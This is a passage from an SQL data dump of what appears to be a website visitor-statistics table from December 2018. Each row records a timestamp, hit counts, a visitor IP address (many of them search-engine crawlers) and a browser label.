346940,1544074740,1,1,0,0,'66.249.66.157','chrome'),(346941,1544074745,1,1,0,0,'157.55.39.129','other'),(346942,1544074810,1,1,0,0,'141.8.142.103','other'),(346943,1544075169,2,2,0,0,'66.249.66.42','chrome'),(346944,1544075350,1,1,0,0,'66.249.66.40','chrome'),(346945,1544075370,1,1,0,0,'66.249.66.155','chrome'),(346946,1544075378,4,4,0,0,'66.249.66.152','chrome'),(346947,1544075435,2,2,0,0,'66.249.66.44','chrome'),(346948,1544075796,2,2,0,0,'66.249.66.156','chrome'),(346949,1544075822,1,1,0,0,'66.249.66.154','chrome'),(346950,1544076003,1,1,0,0,'207.46.13.198','other'),(346951,1544076576,1,1,0,0,'54.36.148.111','other'),(346952,1544076623,1,1,0,0,'54.36.148.72','other'),(346953,1544076662,1,1,0,0,'54.36.148.102','other'),(346954,1544076672,2,2,0,0,'184.174.119.63','chrome'),(346955,1544076747,1,1,0,0,'66.249.66.154','chrome'),(346956,1544076865,1,1,0,0,'66.249.66.40','chrome'),(346957,1544077386,1,1,0,0,'157.55.39.219','other'),(346958,1544077415,1,1,0,0,'8.29.198.26','other'),(346959,1544077906,1,1,0,0,'5.45.207.79','other'),(346960,1544078356,1,1,0,0,'54.36.148.209','other'),(346961,1544078552,1,1,0,0,'207.46.13.198','other'),(346962,1544078913,3,3,0,0,'91.196.178.77','chrome'),(346963,1544078939,1,1,0,0,'178.154.244.29','other'),(346964,1544079087,1,1,0,0,'66.249.66.152','chrome'),(346965,1544079319,1,1,0,0,'8.29.198.26','other'),(346966,1544079464,1,1,0,0,'8.29.198.25','other'),(346967,1544079748,1,1,0,0,'54.36.148.116','other'),(346968,1544079839,1,1,0,0,'91.196.178.77','chrome'),(346969,1544079896,1,1,0,0,'157.55.39.219','other'),(346970,1544080003,1,1,0,0,'66.249.66.155','chrome'),(346971,1544080031,1,1,0,0,'66.249.66.152','chrome'),(346972,1544080123,1,1,0,0,'66.249.66.40','chrome'),(346973,1544080259,1,1,0,0,'66.249.66.42','chrome'),(346974,1544080420,1,1,0,0,'54.36.149.16','other'),(346975,1544080719,1,1,0,0,'87.250.224.107','other'),(346976,1544080751,1,1,0,0,'91.196.178.77','chrome'),(346977,1544080918,1,1,0,0,'213.180.203.48','other'),(346978,1544080923,1,1,0,0,'5.45.207.19','other'),(346979,1544080930,1,1,0,0,'141.8.142.103','other'),(346980,1544081024,1,1,0,0,'178.154.171.24','other'),(346981,1544081086,1,1,0,0,'54.36.148.238','other'),(346982,1544081205,1,1,0,0,'46.229.168.137','other'),(346983,1544081207,1,1,0,0,'46.229.168.154','other'),(346984,1544081386,1,1,0,0,'54.36.148.52','other'),(346985,1544081683,4,4,0,0,'91.196.178.77','chrome'),(346986,1544081866,1,1,0,0,'66.249.66.157','chrome'),(346987,1544082177,1,1,0,0,'54.36.148.137','other'),(346988,1544082216,1,1,0,0,'66.249.66.152','chrome'),(346989,1544082286,3,3,0,0,'91.124.182.170','firefox'),(346990,1544082429,1,1,0,0,'94.153.216.122','chrome'),(346991,1544082637,1,1,0,0,'91.196.178.77','chrome'),(346992,1544083171,1,1,0,0,'91.196.178.94','chrome'),(346993,1544083464,1,1,0,0,'157.55.39.219','other'),(346994,1544083652,1,1,0,0,'54.36.148.205','other'),(346995,1544084351,1,1,0,0,'54.36.148.95','other'),(346996,1544084424,2,2,0,0,'91.196.178.103','chrome'),(346997,1544084926,2,2,0,0,'91.196.178.169','chrome'),(346998,1544085042,3,3,0,0,'66.249.66.156','chrome'),(346999,1544085113,2,2,0,0,'91.209.11.236','other'),(347000,1544085840,2,2,0,0,'66.249.66.40','chrome'),(347001,1544085867,1,1,0,0,'54.36.148.186','other'),(347002,1544085901,1,1,0,0,'66.249.66.152','chrome'),(347003,1544085930,1,1,0,0,'66.249.66.44','chrome'),(347004,1544086070,1,1,0,0,'54.36.149.89','other'),(347005,1544086135,1,1,0,0,'185.156.174.243','chrome'),(347006,1544086263,3,3,0,0,'178.154.244.29','other'),(347007,1544086503,1,1,0,0,'207.46.13.198','other'),(347008,1544086653,1,1,0,0,'54.36.149.24','other'),(347009,1544087122,1,1,0,0,'54.36.149.72','other'),(347010,1544087170,2,2,0,0,'66.249.66.44','chrome'),(347011,1544087194,1,1,0,0,'91.196.178.94','chrome'),(347012,1544087267,1,1,0,0,'54.36.149.61','other'),(347013,1544087293,2,2,0,0,'91.196.178.77','firefox'),(347014,1544087366,18,18,0,0,'178.154.244.29','other'),(347015,1544087495,1,1,0,0,'54.36.149.91','other'),(347016,1544087508,2,2,0,0,'66.249.66.154','chrome'),(347017,1544087510,1,1,0,0,'66.249.66.42','chrome'),(347018,1544087747,1,1,0,0,'213.180.203.9','other'),(347019,1544087749,6,6,0,0,'178.154.244.11','other'),(347020,1544088020,1,1,0,0,'66.249.66.156','chrome'),(347021,1544088049,3,3,0,0,'37.55.227.85','chrome'),(347022,1544088117,1,1,0,0,'5.45.207.19','other'),(347023,1544088202,1,1,0,0,'176.15.231.136','msie'),(347024,1544088252,1,1,0,0,'8.29.198.26','other'),(347025,1544088349,1,1,0,0,'66.249.66.44','chrome'),(347026,1544088521,1,1,0,0,'178.154.244.29','other'),(347027,1544088787,1,1,0,0,'91.196.178.94','chrome'),(347028,1544088900,3,3,0,0,'66.249.66.42','chrome'),(347029,1544089106,1,1,0,0,'91.196.178.77','firefox'),(347030,1544089210,1,1,0,0,'54.36.149.11','other'),(347031,1544089395,1,1,0,0,'54.36.149.92','other'),(347032,1544089422,1,1,0,0,'66.249.66.44','chrome'),(347033,1544089528,1,1,0,0,'54.36.148.111','other'),(347034,1544089538,1,1,0,0,'5.45.207.8','other'),(347035,1544089558,1,1,0,0,'141.8.142.38','other'),(347036,1544089564,1,1,0,0,'178.154.244.21','other'),(347037,1544089598,1,1,0,0,'66.249.66.152','chrome'),(347038,1544089636,1,1,0,0,'176.67.10.150','chrome'),(347039,1544089639,1,1,0,0,'157.55.39.129','other'),(347040,1544089740,1,1,0,0,'54.36.148.164','other'),(347041,1544089820,1,1,0,0,'87.250.224.47','other'),(347042,1544090128,1,1,0,0,'40.77.167.212','other'),(347043,1544090168,1,1,0,0,'8.29.198.27','other'),(347044,1544090246,1,1,0,0,'207.46.13.198','other'),(347045,1544090311,1,1,0,0,'8.29.198.25','other'),(347046,1544090425,1,1,0,0,'207.46.13.247','other'),(347047,1544090503,2,2,0,0,'91.196.178.77','firefox'),(347048,1544090599,1,1,0,0,'66.249.66.154','chrome'),(347049,1544091193,1,1,0,0,'66.249.66.156','chrome'),(347050,1544091208,1,1,0,0,'66.249.66.40','chrome'),(347051,1544091224,1,1,0,0,'46.229.168.154','other'),(347052,1544091253,1,1,0,0,'178.154.244.11','other'),(347053,1544091267,1,1,0,0,'54.36.148.127','other'),(347054,1544091550,1,1,0,0,'157.55.39.129','other'),(347055,1544091880,1,1,0,0,'54.36.148.209','other'),(347056,1544092078,3,3,0,0,'91.196.179.33','chrome'),(347057,1544092703,1,1,0,0,'176.67.10.150','chrome'),(347058,1544093056,1,1,0,0,'66.102.9.35','chrome'),(347060,1544093058,1,1,0,0,'107.178.194.21','chrome'),(347061,1544093060,1,1,0,0,'107.178.194.20','chrome'),(347062,1544093459,1,1,0,0,'54.36.148.83','other'),(347063,1544093518,1,1,0,0,'207.46.13.198','other'),(347064,1544093580,2,2,0,0,'91.196.178.94','chrome'),(347065,1544093624,1,1,0,0,'66.249.66.42','chrome'),(347066,1544093740,1,1,0,0,'54.36.148.15','other'),(347067,1544093814,1,1,0,0,'54.36.149.83','other'),(347068,1544093983,2,2,0,0,'66.249.66.154','chrome'),(347069,1544094031,1,1,0,0,'54.36.149.2','other'),(347070,1544094219,1,1,0,0,'178.95.246.220','chrome'),(347071,1544094412,1,1,0,0,'66.249.66.152','chrome'),(347072,1544094444,2,2,0,0,'91.196.178.77','chrome'),(347073,1544094743,1,1,0,0,'54.36.148.17','other'),(347074,1544095076,1,1,0,0,'54.36.149.24','other'),(347075,1544095105,1,1,0,0,'95.163.255.192','other'),(347076,1544095108,1,1,0,0,'95.163.255.167','other'),(347077,1544095922,1,1,0,0,'95.163.255.170','other'),(347078,1544095925,1,1,0,0,'95.163.255.178','other'),(347079,1544096096,2,2,0,0,'66.249.66.152','chrome'),(347080,1544096111,2,2,0,0,'66.249.66.154','chrome'),(347081,1544096160,1,1,0,0,'66.249.66.42','chrome'),(347082,1544097131,1,1,0,0,'66.249.66.156','chrome'),(347083,1544097378,1,1,0,0,'66.249.66.40','chrome'),(347084,1544098054,1,1,0,0,'54.36.148.196','other'),(347085,1544098279,2,2,0,0,'207.46.13.89','other'),(347086,1544098857,1,1,0,0,'207.46.13.247','other'),(347087,1544099049,2,2,0,0,'91.196.178.94','chrome'),(347088,1544099089,3,3,0,0,'66.249.66.152','chrome'),(347089,1544099102,1,1,0,0,'8.29.198.25','other'),(347090,1544099160,1,1,0,0,'66.249.66.42','chrome'),(347091,1544099969,1,1,0,0,'207.46.13.198','other'),(347092,1544100122,1,1,0,0,'141.8.142.108','other'),(347093,1544100125,1,1,0,0,'93.158.166.7','other'),(347094,1544100151,1,1,0,0,'141.8.142.191','other'),(347095,1544100154,1,1,0,0,'178.154.244.21','other'),(347096,1544100549,1,1,0,0,'195.60.228.37','chrome'),(347097,1544100826,1,1,0,0,'95.108.213.4','other'),(347099,1544100830,1,1,0,0,'5.45.207.79','other'),(347100,1544100831,1,1,0,0,'178.154.244.11','other'),(347101,1544100967,3,3,0,0,'66.249.66.154','chrome'),(347102,1544101005,1,1,0,0,'8.29.198.25','other'),(347103,1544101025,1,1,0,0,'46.229.168.140','other'),(347104,1544101151,1,1,0,0,'8.29.198.26','other'),(347105,1544101942,3,3,0,0,'66.249.66.156','chrome'),(347106,1544102078,4,4,0,0,'66.249.66.152','chrome'),(347107,1544102159,1,1,0,0,'66.249.66.40','chrome'),(347108,1544102355,2,2,0,0,'95.163.255.67','other'),(347109,1544102362,1,1,0,0,'95.163.255.69','other'),(347110,1544102813,2,2,0,0,'207.46.13.89','other'),(347111,1544102846,1,1,0,0,'66.249.66.157','chrome'),(347112,1544103053,1,1,0,0,'157.55.39.219','other'),(347113,1544103057,1,1,0,0,'31.148.135.206','opera'),(347114,1544103093,1,1,0,0,'95.163.255.63','other'),(347115,1544103141,1,1,0,0,'66.249.66.42','chrome'),(347116,1544103235,1,1,0,0,'207.46.13.198','other'),(347117,1544103615,2,2,0,0,'78.26.130.67','firefox'),(347118,1544103771,1,1,0,0,'66.249.66.152','chrome'),(347119,1544103933,2,2,0,0,'207.46.13.89','other'),(347120,1544104186,2,2,0,0,'34.213.180.247','chrome'),(347121,1544104272,3,3,0,0,'66.249.66.156','chrome'),(347122,1544104407,1,1,0,0,'66.249.66.157','chrome'),(347123,1544104443,1,1,0,0,'207.46.13.198','other'),(347124,1544104444,1,1,0,0,'66.249.66.154','chrome'),(347125,1544104723,1,1,0,0,'46.229.168.137','other'),(347126,1544104794,1,1,0,0,'66.249.66.152','chrome'),(347127,1544105253,1,1,0,0,'178.154.244.29','other'),(347128,1544105512,2,2,0,0,'157.55.39.219','other'),(347129,1544105544,1,1,0,0,'93.183.221.4','chrome'),(347130,1544105744,1,1,0,0,'66.249.66.42','chrome'),(347131,1544106205,2,2,0,0,'66.249.66.154','chrome'),(347132,1544106574,1,1,0,0,'91.196.178.94','chrome'),(347133,1544106679,1,1,0,0,'93.183.221.4','chrome'),(347134,1544107161,1,1,0,0,'157.55.39.129','other'),(347135,1544107170,2,2,0,0,'91.196.178.133','firefox'),(347136,1544107252,2,2,0,0,'95.132.1.193','firefox'),(347137,1544107354,2,2,0,0,'95.163.255.193','other'),(347138,1544107664,1,1,0,0,'66.249.66.44','chrome'),(347139,1544107745,2,2,0,0,'91.196.178.77','firefox'),(347140,1544108093,1,1,0,0,'66.249.66.157','chrome'),(347141,1544108118,1,1,0,0,'66.249.66.152','chrome'),(347142,1544108264,1,1,0,0,'46.229.168.136','other'),(347143,1544108413,1,1,0,0,'66.249.66.156','chrome'),(347144,1544108722,1,1,0,0,'91.196.178.77','firefox'),(347145,1544109601,1,1,0,0,'207.46.13.89','other'),(347146,1544109684,2,2,0,0,'66.249.66.152','chrome'),(347147,1544109755,1,1,0,0,'91.196.178.77','firefox'),(347148,1544109940,1,1,0,0,'8.29.198.26','other'),(347149,1544110135,1,1,0,0,'157.55.39.219','other'),(347150,1544110167,1,1,0,0,'207.46.13.198','other'),(347151,1544110364,1,1,0,0,'66.249.66.157','chrome'),(347152,1544110372,1,1,0,0,'66.249.66.155','chrome'),(347153,1544110381,1,1,0,0,'66.249.66.156','chrome'),(347154,1544110599,2,2,0,0,'66.249.66.154','chrome'),(347155,1544110779,1,1,0,0,'91.196.178.77','firefox'),(347156,1544111181,1,1,0,0,'207.46.13.89','other'),(347157,1544111381,1,1,0,0,'95.163.255.166','other'),(347158,1544111384,1,1,0,0,'95.163.255.176','other'),(347159,1544111459,2,2,0,0,'66.249.66.156','chrome'),(347160,1544111507,2,2,0,0,'46.229.168.142','other'),(347161,1544111856,1,1,0,0,'8.29.198.27','other'),(347162,1544111993,1,1,0,0,'8.29.198.26','other'),(347163,1544112240,1,1,0,0,'91.196.178.173','chrome'),(347164,1544112350,1,1,0,0,'31.43.31.60','chrome'),(347165,1544112360,1,1,0,0,'66.249.66.154','chrome'),(347166,1544112373,1,1,0,0,'66.249.66.152','chrome'),(347167,1544112532,2,2,0,0,'46.185.9.140','chrome'),(347168,1544112579,1,1,0,0,'91.196.178.77','firefox'),(347169,1544113071,1,1,0,0,'207.46.13.89','other'),(347170,1544113168,1,1,0,0,'157.55.39.219','other'),(347171,1544113287,2,2,0,0,'66.249.66.152','chrome'),(347172,1544113405,1,1,0,0,'66.249.66.157','chrome'),(347173,1544113494,6,6,0,0,'91.242.162.25','other'),(347174,1544113638,1,1,0,0,'66.249.66.156','chrome'),(347175,1544113660,1,1,0,0,'66.249.66.154','chrome'),(347176,1544113822,1,1,0,0,'180.76.15.154','other'),(347177,1544114077,1,1,0,0,'46.229.168.137','other'),(347178,1544114505,4,4,0,0,'91.242.162.25','other'),(347179,1544114640,1,1,0,0,'66.249.66.156','chrome'),(347180,1544114689,2,2,0,0,'66.249.66.152','chrome'),(347181,1544115097,1,1,0,0,'66.249.66.57','chrome'),(347182,1544115116,2,2,0,0,'66.249.66.40','chrome'),(347183,1544115600,6,6,0,0,'91.242.162.25','other'),(347184,1544115701,1,1,0,0,'66.249.66.152','chrome'),(347185,1544115949,1,1,0,0,'66.249.66.156','chrome'),(347186,1544116014,1,1,0,0,'207.46.13.198','other'),(347187,1544116060,1,1,0,0,'66.249.66.154','chrome'),(347188,1544116167,1,1,0,0,'157.55.39.219','other'),(347189,1544116406,1,1,0,0,'54.36.149.85','other'),(347190,1544116437,1,1,0,0,'54.36.148.232','other'),(347191,1544116445,1,1,0,0,'157.55.39.129','other'),(347192,1544116570,7,7,0,0,'91.242.162.25','other'),(347193,1544116823,1,1,0,0,'94.240.187.244','firefox'),(347194,1544116886,2,2,0,0,'66.249.66.152','chrome'),(347195,1544116890,1,1,0,0,'54.36.148.76','other'),(347196,1544117120,2,2,0,0,'66.249.66.155','chrome'),(347197,1544117593,1,1,0,0,'66.249.66.156','chrome'),(347198,1544117779,2,2,0,0,'141.101.14.146','chrome'),(347199,1544117878,2,2,0,0,'66.249.66.152','chrome'),(347200,1544117912,1,1,0,0,'46.229.168.133','other'),(347201,1544118026,4,4,0,0,'91.242.162.25','other'),(347202,1544118333,2,2,0,0,'178.95.124.13','firefox'),(347203,1544118334,1,1,0,0,'66.249.66.42','chrome'),(347204,1544118449,1,1,0,0,'54.36.148.191','other'),(347205,1544118497,1,1,0,0,'54.36.149.107','other'),(347206,1544118562,1,1,0,0,'54.36.148.217','other'),(347207,1544118564,1,1,0,0,'207.46.13.89','other'),(347208,1544118584,1,1,0,0,'157.55.39.219','other'),(347209,1544118752,1,1,0,0,'54.36.149.104','other'),(347210,1544118935,1,1,0,0,'66.249.66.61','chrome'),(347211,1544118948,1,1,0,0,'209.17.96.66','other'),(347212,1544118953,1,1,0,0,'66.249.66.40','chrome'),(347213,1544119060,6,6,0,0,'91.242.162.25','other'),(347214,1544119139,1,1,0,0,'207.46.13.4','other'),(347215,1544119297,1,1,0,0,'54.36.148.75','other'),(347216,1544119312,1,1,0,0,'66.249.66.156','chrome'),(347217,1544119333,1,1,0,0,'66.249.66.152','chrome'),(347218,1544119404,1,1,0,0,'188.255.1.234','msie'),(347219,1544119641,1,1,0,0,'54.36.148.198','other'),(347220,1544119696,1,1,0,0,'66.249.66.157','chrome'),(347221,1544119714,1,1,0,0,'66.249.66.154','chrome'),(347222,1544119796,1,1,0,0,'207.46.13.5','other'),(347223,1544120059,1,1,0,0,'46.229.168.153','other'),(347224,1544120075,2,2,0,0,'91.242.162.25','other'),(347225,1544120747,1,1,0,0,'66.249.66.156','chrome'),(347226,1544120786,1,1,0,0,'8.29.198.26','other'),(347227,1544120885,1,1,0,0,'54.36.148.241','other'),(347228,1544121175,1,1,0,0,'66.249.66.155','chrome'),(347229,1544121204,1,1,0,0,'66.249.66.154','chrome'),(347230,1544121267,1,1,0,0,'207.46.13.4','other'),(347231,1544121379,1,1,0,0,'66.249.66.152','chrome'),(347232,1544121426,1,1,0,0,'54.36.148.137','other'),(347233,1544121689,12,12,0,0,'91.242.162.25','other'),(347234,1544121883,1,1,0,0,'54.36.148.208','other'),(347235,1544122230,1,1,0,0,'207.46.13.4','other'),(347236,1544122282,1,1,0,0,'66.249.66.44','chrome'),(347237,1544122616,10,10,0,0,'91.242.162.25','other'),(347238,1544122640,2,2,0,0,'207.46.13.5','other'),(347239,1544122711,2,2,0,0,'8.29.198.26','other'),(347240,1544123622,2,2,0,0,'91.209.11.236','other'),(347241,1544123685,2,2,0,0,'91.242.162.25','other'),(347242,1544123697,2,2,0,0,'66.249.66.152','chrome'),(347243,1544123861,1,1,0,0,'46.229.168.130','other'),(347244,1544123885,1,0,1,0,'66.249.66.156',''),(347245,1544124186,2,2,0,0,'185.11.31.78','chrome'),(347246,1544124233,1,1,0,0,'54.36.148.153','other'),(347247,1544124244,1,1,0,0,'54.36.148.208','other'),(347248,1544124314,1,1,0,0,'54.36.148.66','other'),(347249,1544124457,1,1,0,0,'66.249.66.154','chrome'),(347250,1544124749,1,1,0,0,'46.229.168.138','other'),(347251,1544124751,1,1,0,0,'46.229.168.145','other'),(347252,1544124858,1,1,0,0,'54.36.149.22','other'),(347253,1544125164,14,14,0,0,'91.242.162.25','other'),(347254,1544125689,1,1,0,0,'54.36.148.123','other'),(347255,1544125758,1,1,0,0,'46.229.168.129','other'),(347256,1544125899,1,1,0,0,'66.249.66.154','chrome'),(347257,1544125903,1,1,0,0,'66.249.66.44','chrome'),(347258,1544125936,1,1,0,0,'54.36.149.98','other'),(347259,1544126114,14,14,0,0,'178.154.244.29','other'),(347260,1544126193,9,9,0,0,'178.154.244.11','other'),(347261,1544126196,1,1,0,0,'5.45.207.79','other'),(347262,1544126261,1,1,0,0,'87.250.224.47','other'),(347263,1544126683,1,1,0,0,'66.249.66.40','chrome'),(347264,1544126776,4,4,0,0,'91.242.162.25','other'),(347265,1544126809,1,1,0,0,'66.249.66.154','chrome'),(347266,1544126944,1,1,0,0,'66.249.66.152','chrome'),(347267,1544127015,15,15,0,0,'178.154.244.29','other'),(347268,1544127042,1,1,0,0,'54.36.149.81','other'),(347269,1544127080,1,1,0,0,'54.36.148.208','other'),(347270,1544127171,1,1,0,0,'178.154.244.11','other'),(347271,1544127246,3,3,0,0,'5.45.207.79','other'),(347272,1544127296,1,1,0,0,'37.9.113.20','other'),(347273,1544127352,2,2,0,0,'18.212.222.66','other'),(347274,1544127353,1,1,0,0,'54.36.148.143','other'),(347275,1544127429,1,1,0,0,'188.163.5.59','chrome'),(347276,1544127464,1,1,0,0,'54.36.149.96','other'),(347277,1544127490,1,1,0,0,'66.249.66.42','chrome'),(347278,1544127491,1,1,0,0,'40.77.167.181','other'),(347279,1544127724,1,1,0,0,'66.249.66.154','chrome'),(347280,1544128016,1,1,0,0,'46.229.168.129','other'),(347281,1544128026,4,4,0,0,'178.154.244.29','other'),(347282,1544128114,2,2,0,0,'178.154.244.11','other'),(347283,1544128367,1,1,0,0,'66.249.66.44','chrome'),(347284,1544128387,1,1,0,0,'66.249.66.156','chrome'),(347285,1544128751,1,1,0,0,'54.36.148.146','other'),(347286,1544128967,1,1,0,0,'46.229.168.140','other'),(347287,1544129069,1,1,0,0,'46.229.168.145','other'),(347288,1544129084,1,1,0,0,'207.46.13.5','other'),(347289,1544129148,1,1,0,0,'54.36.148.128','other'),(347290,1544129579,1,1,0,0,'5.58.223.88','firefox'),(347291,1544129644,1,1,0,0,'66.249.66.157','chrome'),(347292,1544129669,2,2,0,0,'66.249.66.152','chrome'),(347293,1544129719,1,1,0,0,'66.249.66.156','chrome'),(347294,1544129760,1,1,0,0,'54.36.148.169','other'),(347295,1544130832,1,1,0,0,'66.249.66.154','chrome'),(347296,1544131172,2,2,0,0,'91.209.11.236','other'),(347297,1544131515,1,1,0,0,'207.46.13.4','other'),(347298,1544131528,1,1,0,0,'54.36.149.103','other'),(347299,1544131650,1,1,0,0,'8.29.198.26','other'),(347300,1544131997,1,1,0,0,'178.154.244.11','other'),(347301,1544132103,1,1,0,0,'54.36.148.168','other'),(347302,1544132615,1,1,0,0,'46.229.168.136','other'),(347303,1544132646,1,1,0,0,'91.196.178.97','chrome'),(347304,1544132921,1,1,0,0,'54.36.148.192','other'),(347305,1544133429,2,2,0,0,'207.46.13.4','other'),(347306,1544133536,1,1,0,0,'54.36.148.130','other'),(347307,1544133556,2,2,0,0,'8.29.198.25','other'),(347308,1544134030,1,1,0,0,'54.36.149.105','other'),(347309,1544134305,1,1,0,0,'207.46.13.5','other'),(347310,1544134383,1,1,0,0,'207.46.13.4','other'),(347311,1544134497,1,1,0,0,'54.36.148.59','other'),(347312,1544134654,1,1,0,0,'54.36.148.243','other'),(347313,1544134711,2,2,0,0,'95.163.255.104','other'),(347314,1544134727,1,1,0,0,'95.163.255.108','other'),(347315,1544134762,1,1,0,0,'54.36.149.68','other'),(347316,1544134773,2,2,0,0,'95.163.255.102','other'),(347317,1544134784,2,2,0,0,'207.46.13.178','other'),(347318,1544134863,2,2,0,0,'95.163.255.109','other'),(347319,1544134958,2,2,0,0,'95.163.255.118','other'),(347320,1544135058,1,1,0,0,'46.229.168.153','other'),(347321,1544135085,1,1,0,0,'95.163.255.103','other'),(347322,1544135137,1,1,0,0,'46.229.168.146','other'),(347323,1544135359,1,1,0,0,'95.163.255.119','other'),(347324,1544135466,1,1,0,0,'178.154.244.29','other'),(347326,1544135470,1,1,0,0,'5.45.207.19','other'),(347327,1544135472,1,1,0,0,'141.8.142.108','other'),(347328,1544135517,3,3,0,0,'95.163.255.117','other'),(347329,1544135538,1,1,0,0,'95.163.255.115','other'),(347330,1544135610,1,1,0,0,'95.163.255.113','other'),(347331,1544135625,1,1,0,0,'95.163.255.114','other'),(347332,1544135641,1,1,0,0,'95.163.255.105','other'),(347333,1544135657,1,1,0,0,'95.163.255.104','other'),(347334,1544135683,1,1,0,0,'95.163.255.102','other'),(347335,1544136180,1,1,0,0,'46.229.168.146','other'),(347336,1544136390,2,2,0,0,'212.90.42.83','chrome'),(347337,1544136550,1,1,0,0,'54.36.148.202','other'),(347338,1544136767,1,1,0,0,'46.229.168.130','other'),(347339,1544136768,1,1,0,0,'46.229.168.134','other'),(347340,1544136996,1,1,0,0,'54.36.148.115','other'),(347341,1544137155,1,1,0,0,'46.229.168.151','other'),(347342,1544137249,1,1,0,0,'207.46.13.2','other'),(347343,1544137313,1,1,0,0,'207.46.13.178','other'),(347344,1544137903,1,1,0,0,'46.229.168.143','other'),(347345,1544138247,1,1,0,0,'207.46.13.178','other'),(347346,1544139254,1,1,0,0,'207.46.13.4','other'),(347347,1544139349,1,1,0,0,'46.229.168.148','other'),(347348,1544139381,1,1,0,0,'54.36.148.175','other'),(347349,1544139397,2,2,0,0,'207.46.13.178','other'),(347350,1544140159,1,1,0,0,'207.46.13.4','other'),(347351,1544140648,1,1,0,0,'207.46.13.178','other'),(347352,1544140768,1,1,0,0,'54.36.149.63','other'),(347353,1544140784,1,1,0,0,'54.36.148.29','other'),(347354,1544141140,1,1,0,0,'54.36.149.39','other'),(347355,1544141247,1,1,0,0,'54.36.148.204','other'),(347356,1544141497,1,1,0,0,'54.36.148.38','other'),(347357,1544141648,1,1,0,0,'46.229.168.141','other'),(347358,1544142041,1,1,0,0,'46.229.168.134','other'),(347359,1544142137,3,3,0,0,'157.55.39.153','other'),(347360,1544142509,1,1,0,0,'8.29.198.25','other'),(347361,1544142986,2,2,0,0,'207.46.13.178','other'),(347362,1544143003,1,1,0,0,'54.36.148.171','other'),(347363,1544143260,1,1,0,0,'207.46.13.4','other'),(347364,1544143312,1,1,0,0,'54.36.148.147','other'),(347365,1544143917,1,1,0,0,'54.36.148.234','other'),(347366,1544143990,1,1,0,0,'207.46.13.5','other'),(347367,1544144154,1,1,0,0,'62.210.37.82','other'),(347368,1544144399,2,2,0,0,'8.29.198.26','other'),(347369,1544144549,2,2,0,0,'46.229.168.154','other'),(347370,1544144772,1,1,0,0,'54.36.148.191','other'),(347371,1544144928,1,1,0,0,'54.36.148.181','other'),(347372,1544145238,1,1,0,0,'46.229.168.149','other'),(347373,1544145377,10,10,0,0,'69.30.226.234','other'),(347374,1544145667,2,2,0,0,'157.55.39.153','other'),(347375,1544145734,1,1,0,0,'54.36.148.30','other'),(347376,1544145842,1,1,0,0,'66.102.9.25','chrome'),(347378,1544146288,1,1,0,0,'54.36.149.89','other'),(347379,1544146347,2,2,0,0,'207.46.13.5','other'),(347380,1544146656,8,8,0,0,'69.30.226.234','other'),(347381,1544146720,2,2,0,0,'209.90.225.115','chrome'),(347382,1544146744,1,1,0,0,'54.36.148.67','other'),(347383,1544147249,1,1,0,0,'46.229.168.152','other'),(347384,1544147251,1,1,0,0,'46.229.168.142','other'),(347385,1544147292,1,1,0,0,'207.46.13.5','other'),(347386,1544147379,1,1,0,0,'46.229.168.137','other'),(347387,1544147643,1,1,0,0,'157.55.39.153','other'),(347388,1544148394,1,1,0,0,'46.229.168.154','other'),(347389,1544148566,1,1,0,0,'207.46.13.5','other'),(347390,1544150624,1,1,0,0,'157.55.39.153','other'),(347391,1544150632,1,1,0,0,'54.36.148.42','other'),(347392,1544151195,1,1,0,0,'46.229.168.133','other'),(347393,1544151197,1,1,0,0,'207.46.13.5','other'),(347394,1544151228,1,1,0,0,'54.36.148.201','other'),(347395,1544151449,1,1,0,0,'54.36.149.96','other'),(347396,1544151577,1,1,0,0,'46.229.168.137','other'),(347397,1544152163,1,1,0,0,'40.77.167.3','other'),(347398,1544152350,2,2,0,0,'52.53.201.78','chrome'),(347399,1544152449,10,10,0,0,'178.154.244.29','other'),(347400,1544152621,8,8,0,0,'178.154.244.11','other'),(347401,1544152690,8,8,0,0,'5.45.207.79','other'),(347402,1544152816,2,2,0,0,'157.55.39.76','other'),(347403,1544153145,1,1,0,0,'157.55.39.153','other'),(347404,1544153243,1,1,0,0,'141.8.142.103','other'),(347405,1544153277,1,1,0,0,'46.229.168.130','other'),(347406,1544153279,1,1,0,0,'46.229.168.135','other'),(347407,1544153309,2,2,0,0,'37.9.113.148','other'),(347408,1544153354,1,1,0,0,'8.29.198.27','other'),(347409,1544153413,18,18,0,0,'178.154.244.29','other'),(347410,1544153618,3,3,0,0,'40.77.167.3','other'),(347411,1544153624,7,7,0,0,'178.154.244.11','other'),(347412,1544153998,1,1,0,0,'207.46.13.5','other'),(347413,1544154460,1,1,0,0,'5.45.207.79','other'),(347414,1544154522,2,2,0,0,'37.9.113.103','other'),(347415,1544154625,1,1,0,0,'54.36.148.37','other'),(347416,1544154837,1,1,0,0,'141.8.183.23','other'),(347417,1544154898,2,2,0,0,'40.77.167.3','other'),(347418,1544154928,8,8,0,0,'178.154.244.11','other'),(347419,1544154952,2,2,0,0,'178.154.171.27','other'),(347420,1544154960,16,16,0,0,'178.154.244.29','other'),(347421,1544155096,1,1,0,0,'213.180.203.40','other'),(347422,1544155119,1,1,0,0,'5.45.207.19','other'),(347423,1544155121,2,2,0,0,'141.8.142.103','other'),(347424,1544155257,1,1,0,0,'8.29.198.26','other'),(347425,1544155350,1,1,0,0,'8.29.198.27','other'),(347426,1544155491,1,1,0,0,'157.55.39.76','other'),(347427,1544155784,1,1,0,0,'87.250.224.47','other'),(347428,1544156033,4,4,0,0,'178.154.244.29','other'),(347429,1544156117,1,1,0,0,'46.229.168.147','other'),(347430,1544156133,2,2,0,0,'178.154.244.11','other'),(347431,1544156536,1,1,0,0,'207.46.13.5','other'),(347432,1544157250,1,1,0,0,'40.77.167.3','other'),(347433,1544157349,1,1,0,0,'54.36.148.28','other'),(347434,1544157417,1,1,0,0,'46.229.168.149','other'),(347435,1544157441,1,1,0,0,'54.36.148.82','other'),(347436,1544157610,1,1,0,0,'54.36.148.74','other'),(347437,1544158035,1,1,0,0,'54.36.148.55','other'),(347438,1544158155,1,1,0,0,'46.211.46.98','chrome'),(347439,1544158307,3,3,0,0,'178.154.244.11','other'),(347440,1544158673,2,2,0,0,'157.55.39.76','other'),(347441,1544159477,5,5,0,0,'178.154.244.29','other'),(347442,1544159976,1,1,0,0,'207.46.13.5','other'),(347443,1544160118,1,1,0,0,'46.229.168.141','other'),(347444,1544160121,1,1,0,0,'46.229.168.138','other'),(347445,1544160126,1,1,0,0,'54.36.148.19','other'),(347446,1544160390,6,6,0,0,'136.243.151.90','other'),(347447,1544161210,1,1,0,0,'54.36.148.246','other'),(347448,1544161236,2,2,0,0,'40.77.167.3','other'),(347449,1544161871,1,1,0,0,'46.211.148.